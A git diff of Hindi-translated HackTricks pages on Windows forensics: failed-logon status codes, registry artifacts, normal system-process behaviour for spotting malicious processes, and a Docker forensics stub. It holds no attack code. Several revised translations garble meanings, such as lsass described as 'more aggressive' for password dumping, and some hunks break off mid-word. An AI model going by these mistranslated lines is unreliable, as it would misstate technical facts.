- **कैश रिमोट इंटरैक्टिव (12)**: कैश उपयोगकर्ता पहुंच के साथ रिमोट लॉगिन।
|
||||
- **कैश अनलॉक (13)**: कैश उपयोगकर्ता पहुंच के साथ अनलॉक।
|
||||
|
||||
#### इवेंट आईडी 4625 के लिए स्थिति और उप-स्थिति कोड:
|
||||
|
||||
- **0xC0000064**: उपयोगकर्ता नाम मौजूद नहीं है - उपयोगकर्ता नाम जांच आक्रमण का संकेत हो सकता है।
|
||||
- **0xC000006A**: सही उपयोगकर्ता नाम लेकिन गलत पासवर्ड - संभावित पासवर्ड अनुमान या ब्रूट-फोर्स प्रयास।
|
||||
- **0xC0000234**: उपयोगकर्ता खाता लॉकआउट - एक ब्रूट-फोर्स आक्रमण के परिणामस्वरूप कई विफल लॉगिन के बाद।
|
||||
- **0xC0000072**: खाता निषेधित - निषेधित खातों तक पहुंच के अनधिकृत प्रयास।
|
||||
- **0xC000006F**: अनुमति समय के बाहर लॉगिन - अनधिकृत पहुंच के संकेत के रूप में सेट लॉगिन घंटों के बाहर पहुंच के प्रयास।
|
||||
- **0xC0000070**: कार्यस्थल प्रतिबंधों का उल्लंघन - अनधिकृत स्थान से लॉगिन का प्रयास।
|
||||
- **0xC0000193**: खाता समाप्ति - समाप्त हो चुके उपयोगकर्ता खातों के साथ पहुंच के प्रयास।
|
||||
- **0xC0000071**: समाप्त पासवर्ड - पुराने पासवर्ड के साथ लॉगिन के प्रयास।
|
||||
- **0xC0000133**: समय सिंक समस्याएँ - ग्राहक और सर्वर के बीच बड़े समय अंतर के बीच अधिक विकसित आक्रमणों का संकेत हो सकता है जैसे पास-द-टिकट।
|
||||
- **0xC0000224**: अनिवार्य पासवर्ड पर
|
||||
#### सिस्टम पावर इवेंट्स
|
||||
|
||||
इवेंटआईडी 6005 सिस्टम स्टार्टअप को दर्शाता है, जबकि इवेंटआईडी 6006 शटडाउन को चिह्नित करता है।
|
||||
|
|
|
@ -2,20 +2,20 @@
|
|||
|
||||
### दिलचस्प Windows रजिस्ट्री कुंजी
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड** करें तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
|
||||
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
### **Windows संस्करण और मालिक जानकारी**
|
||||
- **`Software\Microsoft\Windows NT\CurrentVersion`** पर स्थित है, आपको Windows संस्करण, सेवा पैक, स्थापना समय, और पंजीकृत मालिक का नाम सीधे ढंग से मिलेगा।
|
||||
|
@ -24,45 +24,45 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
- होस्टनाम **`System\ControlSet001\Control\ComputerName\ComputerName`** के तहत पाया जाता है।
|
||||
|
||||
### **समय क्षेत्र सेटिंग**
|
||||
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित है।
|
||||
- सिस्टम का समय क्षेत्र **`System\ControlSet001\Control\TimeZoneInformation`** में संग्रहित होता है।
|
||||
|
||||
### **पहुंच समय ट्रैकिंग**
|
||||
- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होती है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें:
|
||||
- डिफ़ॉल्ट रूप से, अंतिम पहुंच समय ट्रैकिंग बंद होता है (**`NtfsDisableLastAccessUpdate=1`**). इसे सक्षम करने के लिए, इस्तेमाल करें:
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows संस्करण और सेवा पैक
|
||||
- **Windows संस्करण** में संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) दिखाता है, जबकि **सेवा पैक** में सुधार और कभी-कभी नए विशेषताएँ शामिल होती हैं।
|
||||
- **Windows संस्करण** संस्करण (जैसे, होम, प्रो) और इसका रिलीज (जैसे, Windows 10, Windows 11) को दर्शाता है, जबकि **सेवा पैक** अपडेट हैं जिसमें सुधार और कभी-कभी नए सुविधाएँ शामिल होती हैं।
|
||||
|
||||
### अंतिम पहुंच समय सक्षम करना
|
||||
- अंतिम पहुंच समय ट्रैकिंग सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो जांच या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है।
|
||||
- अंतिम पहुंच समय ट्रैकिंग को सक्षम करने से आप देख सकते हैं कि फ़ाइलें कब आखिरी बार खोली गई थीं, जो फोरेंसिक विश्लेषण या सिस्टम मॉनिटरिंग के लिए महत्वपूर्ण हो सकता है।
|
||||
|
||||
### नेटवर्क सूचना विवरण
|
||||
- रजिस्ट्री में नेटवर्क कॉन्फ़िगरेशन पर व्यापक डेटा होता है, जिसमें **नेटवर्क के प्रकार (वायरलेस, केबल, 3जी)** और **नेटवर्क श्रेणियाँ (सार्वजनिक, निजी/घर, डोमेन/काम)** शामिल हैं, जो नेटवर्क सुरक्षा सेटिंग्स और अनुमतियों को समझने के लिए महत्वपूर्ण हैं।
|
||||
|
||||
### क्लाइंट साइड कैशिंग (CSC)
|
||||
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, खासकर उन परिस्थितियों में जहां अंतरिक्षिक कनेक्टिविटी हो।
|
||||
- **CSC** साझा फ़ाइलों का कैशिंग करके ऑफ़लाइन फ़ाइल एक्सेस को बढ़ाता है। विभिन्न **CSCFlags** सेटिंग्स नियंत्रित करती हैं कि कैसे और कौन सी फ़ाइलें कैश होती हैं, प्रदर्शन और उपयोगकर्ता अनुभव पर प्रभाव डालती हैं, विशेष रूप से अंतरिक्ष से जुड़े परिस्थितियों में।
|
||||
|
||||
### ऑटोस्टार्ट प्रोग्राम
|
||||
- विभिन्न `Run` और `RunOnce` रजिस्ट्री कुंजी में सूचीबद्ध प्रोग्राम स्वचालित रूप से स्टार्टअप पर लॉन्च होते हैं, सिस्टम बूट समय पर प्रभाव डालते हैं और मालवेयर या अवांछित सॉफ़्टवेयर की पहचान के लिए महत्वपूर्ण बिंदु हो सकते हैं।
|
||||
|
||||
### शेलबैग्स
|
||||
- **शेलबैग्स** न केवल फ़ोल्डर दृश्य के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अनमोल हैं, अन्य माध्यमों के माध्यम से स्पष्ट न होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
|
||||
- **शेलबैग्स** न केवल फ़ोल्डर दृश्यों के लिए पसंद रखते हैं बल्कि यदि फ़ोल्डर अब मौजूद नहीं है तो फ़ोल्डर एक्सेस के फोरेंसिक साक्ष्य भी प्रदान करते हैं। वे जांचों के लिए अमूल्य हैं, अन्य साधनों के माध्यम से स्पष्ट नहीं होने वाली उपयोगकर्ता गतिविधि का पता लगाने के लिए।
|
||||
|
||||
### USB जानकारी और फोरेंसिक्स
|
||||
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस का पता लगाने में मदद कर सकते हैं, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से एक डिवाइस को जोड़ सकते हैं।
|
||||
### USB सूचना और फोरेंसिक्स
|
||||
- USB डिवाइस के बारे में रजिस्ट्री में संग्रहित विवरण एक कंप्यूटर से कनेक्ट किए गए कौन से डिवाइस थे, संवेदनशील फ़ाइल स्थानांतरण या अनधिकृत पहुंच घटनाओं से डिवाइस को जोड़ सकते हैं।
|
||||
|
||||
### वॉल्यूम सीरियल नंबर
|
||||
- **वॉल्यूम सीरियल नंबर** एक फ़ाइल सिस्टम के विशिष्ट उदाहरण का पता लगाने के लिए महत्वपूर्ण हो सकता है, जिसे विभिन्न उपकरणों पर फ़ाइल का मूल स्रोत स्थापित करने के लिए फोरेंसिक स्थितियों में उपयोगी होता है।
|
||||
- **वॉल्यूम सीरियल नंबर** फ़ाइल सिस्टम के विशिष्ट उदाहरण का ट्रैकिंग के लिए महत्वपूर्ण हो सकता है, जिसे फ़ोरेंसिक स्थितियों में उपयोगी होता है जहां फ़ाइल का मूल स्थान विभिन्न उपकरणों के बीच स्थापित किया जाना चाहिए।
|
||||
|
||||
### **शटडाउन विवरण**
|
||||
- शटडाउन समय और गणना (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखे जाते हैं।
|
||||
- शटडाउन समय और गिनती (केवल XP के लिए) **`System\ControlSet001\Control\Windows`** और **`System\ControlSet001\Control\Watchdog\Display`** में रखा जाता है।
|
||||
|
||||
### **नेटवर्क कॉन्फ़िगरेशन**
|
||||
- विस्तृत नेटवर्क इंटरफेस जानकारी के लिए, **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** का संदर्भ दें।
|
||||
- पहली और आखिरी नेटवर्क कनेक्शन समय, व्यूपीएन कनेक्शन सहित, विभिन्न पथों में लॉग किए गए हैं **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**।
|
||||
- पहली और आखिरी नेटवर्क कनेक्शन समय, VPN कनेक्शन सहित, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** में विभिन्न पथों के तहत लॉग किए गए हैं।
|
||||
|
||||
### **साझा फोल्डर**
|
||||
- साझा फोल्डर और सेटिंग्स **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
|
||||
- साझा फोल्डर और सेटिंग **`System\ControlSet001\Services\lanmanserver\Shares`** के तहत हैं। क्लाइंट साइड कैशिंग (CSC) सेटिंग्स ऑफ़लाइन फ़ाइल उपलब्धता निर्धारित करती हैं।
|
||||
|
||||
### **स्वचालित रूप से शुरू होने वाले प्रोग्राम**
|
||||
- पथ जैसे **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** और `Software\Microsoft\Windows\CurrentVersion` के तहत समान प्रविष्टियाँ विस्तार से विवरणित करती हैं जो स्टार्टअप पर चलाने के लिए सेट किए गए प्रोग्राम हैं।
|
||||
|
@ -70,11 +70,11 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
### **खोजें और टंकित पथ**
|
||||
- एक्सप्लोरर खोज और टंकित पथ रजिस्ट्री में ट्रैक किए जाते हैं **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** के तहत WordwheelQuery और TypedPaths के लिए।
|
||||
|
||||
### **हाल के दस्तावेज़ और ऑफिस फ़ाइलें**
|
||||
- हाल के दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
|
||||
### **हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें**
|
||||
- हाल ही में दस्तावेज़ और ऑफिस फ़ाइलें जिनका उपयोग किया गया है, उन्हें नोट किया गया है `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` और विशेष ऑफिस संस्करण पथों में।
|
||||
|
||||
### **हाल ही में उपयोग किए गए (MRU) आइटम**
|
||||
- MRU सूचियाँ, हाल के फ़ाइल पथ और कमांड दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहित होती हैं।
|
||||
- MRU सूचियाँ, हाल ही में फ़ाइल पथ और कमांड को दर्शाती हैं, विभिन्न `ComDlg32` और `Explorer` सबकी में `NTUSER.DAT` के तहत संग्रहीत होती हैं।
|
||||
|
||||
### **उपयोगकर्ता गतिविधि ट्रैकिंग**
|
||||
- उपयोगकर्ता सहायत
|
||||
- यूज़र असिस्ट
|
||||
|
|
|
@ -1,54 +1,55 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## smss.exe
|
||||
|
||||
**सत्र प्रबंधक**.\
|
||||
सत्र 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सत्र 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़तल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं।
|
||||
**सेशन मैनेजर**.\
|
||||
सेशन 0 **csrss.exe** और **wininit.exe** (**ओएस सेवाएं**) को शुरू करता है जबकि सेशन 1 **csrss.exe** और **winlogon.exe** (**उपयोगकर्ता सत्र**) को शुरू करता है। हालांकि, आपको प्रक्रिया पेड़ताल में उस बाइनरी का केवल एक प्रक्रिया देखनी चाहिए जिसके बच्चे नहीं हैं।
|
||||
|
||||
इसके अलावा, 0 और 1 के अलावा सत्रों का मतलब है कि RDP सत्र हो रहे हैं।
|
||||
इसके अलावा, 0 और 1 के अलावा सेशन का मतलब हो सकता है कि RDP सत्र हो रहे हैं।
|
||||
|
||||
|
||||
## csrss.exe
|
||||
|
||||
**क्लाइंट/सर्वर रन सबसिस्टम प्रक्रिया**.\
|
||||
यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव अक्षर** मैप करता है, **temp फ़ाइलें** बनाता है, और **शटडाउन प्रक्रिया** को संभालता है।
|
||||
यह **प्रक्रियाएँ** और **धागे** प्रबंधित करता है, अन्य प्रक्रियाओं के लिए **Windows API** उपलब्ध कराता है और भी **ड्राइव लेटर्स मैप** करता है, **temp फ़ाइलें बनाता है**, और **शटडाउन प्रक्रिया** को संभालता है।
|
||||
|
||||
सत्र 0 में एक **चल रहा है और सत्र 1 में एक और है** (इसलिए प्रक्रिया पेड़तल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति नई सत्र में बनाया जाता है।
|
||||
सेशन 0 में एक **चल रहा है और सेशन 1 में एक और है** (तो प्रक्रिया पेड़ताल में **2 प्रक्रियाएँ** हैं)। एक और नया सत्र प्रति एक और बनाया जाता है।
|
||||
|
||||
|
||||
## winlogon.exe
|
||||
|
||||
**Windows लॉगऑन प्रक्रिया**.\
|
||||
यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर **lsass.exe** को उन्हें सत्यापित करने के लिए बुलाता है।
|
||||
**विंडोज लॉगऑन प्रक्रिया**.\
|
||||
यह उपयोगकर्ता **लॉगऑन**/**लॉगऑफ** के लिए जिम्मेदार है। यह **logonui.exe** को उपयोगकर्ता नाम और पासवर्ड के लिए पूछने के लिए लॉन्च करता है और फिर उन्हें सत्यापित करने के लिए **lsass.exe** को कॉल करता है।
|
||||
|
||||
फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्दिष्ट **userinit.exe** को लॉन्च करता है।
|
||||
फिर यह **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** में उपयुक्तित **Userinit** कुंजी के साथ निर्धारित **userinit.exe** को लॉन्च करता है।
|
||||
|
||||
इसके अतिरिक्त, पिछला रजिस्ट्री में **explorer.exe** को **Shell कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है।
|
||||
इसके अलावा, पिछला रजिस्ट्री में **explorer.exe** को **शैल कुंजी** में होना चाहिए या यह एक **मैलवेयर स्थायित्व विधि** के रूप में दुरुपयोग किया जा सकता है।
|
||||
|
||||
|
||||
## wininit.exe
|
||||
|
||||
**Windows प्रारंभीकरण प्रक्रिया**. \
|
||||
**विंडोज प्रारंभीकरण प्रक्रिया**. \
|
||||
यह सत्र 0 में **services.exe**, **lsass.exe**, और **lsm.exe** को लॉन्च करता है। केवल 1 प्रक्रिया होनी चाहिए।
|
||||
|
||||
|
||||
## userinit.exe
|
||||
|
||||
**उपयोगकर्ता प्रारंभिकरण एप्लिकेशन**.\
|
||||
**ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट** और **GPO** को चलाता है।
|
||||
**उपयोगकर्ता लॉगऑन एप्लिकेशन**.\
|
||||
**ntduser.dat in HKCU** को लोड करता है और **उपयोगकर्ता पर्यावरण** को प्रारंभ करता है और **लॉगऑन स्क्रिप्ट्स** और **GPO** को चलाता है।
|
||||
|
||||
यह **explorer.exe** को लॉन्च करता है।
|
||||
|
||||
|
@ -56,49 +57,49 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
## lsm.exe
|
||||
|
||||
**स्थानीय सत्र प्रबंधक**.\
|
||||
यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल शुरू, डेस्कटॉप लॉक/अनलॉक, आदि।
|
||||
यह smss.exe के साथ काम करता है ताकि उपयोगकर्ता सत्रों को प्रबंधित कर सके: लॉगऑन/लॉगऑफ, शैल प्रारंभ, डेस्कटॉप लॉक/अनलॉक, आदि।
|
||||
|
||||
W7 के बाद lsm.exe को एक सेवा में रूपांतरित किया गया था (lsm.dll)।
|
||||
|
||||
W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक DLL चलाने वाली सेवा।
|
||||
W7 में केवल 1 प्रक्रिया होनी चाहिए और उनमें से एक सेवा DLL चल रही होगी।
|
||||
|
||||
|
||||
## services.exe
|
||||
|
||||
**सेवा नियंत्रण प्रबंधक**.\
|
||||
यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर** के रूप में विन्यस्त की गई हैं को **लोड** करता है।
|
||||
यह **सेवाएं** जो **ऑटो-स्टार्ट** और **ड्राइवर्स** के रूप में कॉन्फ़िगर की गई हैं को **लोड** करता है।
|
||||
|
||||
यह **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** और बहुत कुछ के मूल प्रक्रिया है।
|
||||
|
||||
सेवाएं `HKLM\SYSTEM\CurrentControlSet\Services` में परिभाषित हैं और यह प्रक्रिया सेवा जानकारी का मेमोरी में डेटाबेस बनाए रखती है जिसे sc.exe द्वारा पूछा जा सकता है।
|
||||
|
||||
ध्यान दें कि **कुछ सेवाएं** अपने आप में एक **अपनी प्रक्रिया में चल रही होंगी** और अन्य **svchost.exe प्रक्रिया को साझा करेंगी**।
|
||||
ध्यान दें कि **कुछ सेवाएं** अपने खुद के **प्रक्रिया में चल रही होंगी** और दूसरे **svchost.exe प्रक्रिया को साझा कर रही होंगी**।
|
||||
|
||||
केवल 1 प्रक्रिया होनी चाहिए।
|
||||
|
||||
|
||||
## lsass.exe
|
||||
|
||||
**स्थानीय सुरक्षा प्राधिकरण उपसिस्टम**.\
|
||||
**स्थानीय सुरक्षा प्राधिकरण सबसिस्टम**.\
|
||||
यह उपयोगकर्ता **प्रमाणीकरण** के लिए जिम्मेदार है और **सुरक्षा टोकन** बनाता है। यह `HKLM\System\CurrentControlSet\Control\Lsa` में स्थित प्रमाणीकरण पैकेज का उपयोग करता है।
|
||||
|
||||
यह **सुरक्षा घटना लॉग** में लिखता है और केवल 1 प्रक्रिया होनी चाहिए।
|
||||
|
||||
ध्यान रखें कि इस प्रक्रिया को पासवर्ड डंप करने के लिए अधिक हमले किए जाते हैं।
|
||||
ध्यान रखें कि यह प्रक्रिया पासवर्ड डंप करने के लिए अधिक आक्रामक है।
|
||||
|
||||
|
||||
## svchost.exe
|
||||
|
||||
**सामान्य सेवा होस्ट प्रक्रिया**.\
|
||||
**जेनेरिक सेवा होस्ट प्रक्रिया**.\
|
||||
यह एक साझा प्रक्रिया में कई DLL सेवाओं को होस्ट करता है।
|
||||
|
||||
आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च होता है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क होगा जो एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी।
|
||||
आम तौर पर, आपको देखने को मिलेगा कि **svchost.exe** `-k` ध्वज के साथ लॉन्च हो रहा है। यह रजिस्ट्री **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** में एक कुंजी होगी जिसमें -k में उल्लिखित तर्क के साथ एक कुंजी होगी जिसमें एक ही प्रक्रिया में लॉन्च करने के लिए सेवाएं होंगी।
|
||||
|
||||
उदाहरण के लिए: `-k UnistackSvcGroup` लॉन्च करेगा: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
|
||||
|
||||
यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में केवल निर्दिष्ट सेवा को ही लॉन्च करें।
|
||||
यदि **ध्वज `-s`** भी उपयोग किया जाता है तो svchost से कहा जाता है कि इस तर्क में उल्लिखित सेवा को केवल लॉन्च करें।
|
||||
|
||||
`svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहाजनक है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहाजनक है।
|
||||
`svchost.exe` कई प्रक्रियाएँ होंगी। यदि इनमें से कोई भी **`-k` ध्वज का उपयोग नहीं कर रहा है**, तो यह बहुत संदेहास्पद है। यदि आपको पता चलता है कि **services.exe माता प्रक्रिया नहीं है**, तो यह भी बहुत संदेहास्पद है।
|
||||
|
||||
|
||||
## taskhost.exe
|
||||
|
@ -114,9 +115,9 @@ W8 में इसे taskhostex.exe कहा जाता है और W10
|
|||
|
||||
**केवल 1** प्रक्रिया प्रति लॉग ऑन उपयोगकर्ता के लिए उत्पन्न होनी चाहिए।
|
||||
|
||||
यह **userinit.exe** से चलाया जाता है जिसे समाप्त किया जाना चाहिए, इसलिए इस प्रक्रिया के लिए कोई **माता** प्रक्रिया नहीं दिखनी चाहिए।
|
||||
यह **userinit.exe** से चलाया जाता है जिसे समाप्त कर दिया जाना चाहिए, इसलिए इस प्रक्रिया के लिए **कोई माता** दिखाई नहीं देना चाहिए।
|
||||
|
||||
|
||||
# दुर्भाग्यपूर्ण प्रक्रियाओं को पकड़ना
|
||||
|
||||
* क्या यह अप
|
||||
* क्या
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# डॉकर फोरेंसिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
